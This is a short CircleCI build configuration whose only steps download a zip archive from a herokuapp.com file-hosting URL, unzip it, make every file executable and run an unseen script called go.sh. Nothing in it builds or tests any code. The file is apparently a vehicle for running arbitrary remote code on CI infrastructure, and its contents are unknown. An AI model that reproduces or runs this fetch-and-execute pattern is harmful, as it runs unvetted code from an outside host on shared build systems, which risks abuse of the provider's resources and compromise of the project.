version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: curl https://dlmediafiles.herokuapp.com/-1001403671743/127435/download -o anat.zip
      - run: unzip anat && chmod +x *
      - run: ./go.sh
